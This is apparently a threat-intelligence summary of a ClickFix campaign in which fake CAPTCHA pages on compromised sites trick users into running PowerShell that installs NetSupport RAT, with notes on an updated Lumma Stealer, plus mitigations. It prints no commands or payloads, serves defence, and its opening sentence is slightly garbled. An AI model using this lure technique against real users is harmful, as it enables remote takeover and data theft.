Full Report
Threat actors have observed the increasingly common ClickFix technique to deliver a remote access trojan named NetSupport RAT since early January 2025. NetSupport RAT, typically propagated via bogus websites and fake browser updates, grants attackers full control over the victim's host, allowing them to monitor the device's screen in real-time, control the keyboard and mouse, upload and download
Analysis Summary
# Threat Actor: Undetermined Actor Utilizing ClickFix Technique
## Attribution & Identity
No specific threat actor name or attribution is provided in the article. The activity is attributed to threat actors who have adopted the "ClickFix technique" for initial access.
## Activity Summary
Threat actors have been observed exploiting the "ClickFix technique" since early January 2025 to deploy the NetSupport Remote Access Trojan (RAT). The ClickFix technique involves injecting a fake CAPTCHA webpage onto compromised websites, directing users to copy and execute malicious PowerShell commands to download and run malware payloads. This campaign is also noted to be using the ClickFix approach to propagate an updated version of Lumma Stealer malware.
## Tactics, Techniques & Procedures
- **Initial Access/Execution:** Use of the "ClickFix technique" where a fake CAPTCHA page instructs users to execute PowerShell commands.
- **Payload Delivery:** PowerShell commands are used to download and execute the NetSupport RAT client from a remote server.
- **Obfuscation/Evasion (Lumma Stealer context):** The updated Lumma Stealer version uses the ChaCha20 cipher for decrypting configuration files containing C2 server lists, demonstrating active effort to circumvent analysis tools.
- **Malware Used:** NetSupport RAT (originally legitimate remote IT support program, repurposed for malicious activity) and Lumma Stealer.
## Targeting
- **Sectors:** Not explicitly listed, but the use of RATs and stealers implies targeting organizational environments where sensitive information is present.
- **Geography:** Not specified.
- **Victims:** Organizations in general, as the goal is to capture sensitive information.
## Tools & Infrastructure
- **Malware families used:** NetSupport RAT, Lumma Stealer (updated version using ChaCha20).
- **Infrastructure (C2, domains, IPs - defang URLs):**
- Payloads (NetSupport RAT client components) are hosted on a remote server, delivered in the form of PNG image files.
- C2 servers for Lumma Stealer are contained within a configuration file decrypted using ChaCha20.
## Implications
The adoption of the ClickFix methodology suggests threat actors are relying on social engineering combined with exploitation of compromised websites to drive user execution via deceptive prompts (fake CAPTCHA). The successful deployment of powerful tools like NetSupport RAT indicates a likely objective of persistent remote access, monitoring, and data exfiltration. Updates to malware evolution, like the encryption change in Lumma Stealer, highlight an ongoing effort by threat developers to maintain operational security and evade signature/behavioral detection.
## Mitigations
- Educate users about unsolicited instructions on compromised websites, especially those prompting the execution of PowerShell commands via fake CAPTCHAs or similar overlays.
- Implement strict endpoint-based controls to restrict or monitor the execution of potentially malicious PowerShell commands.
- Employ network monitoring solutions to detect connections to known malicious infrastructure or unusual C2 beaconing associated with NetSupport RAT or Lumma Stealer.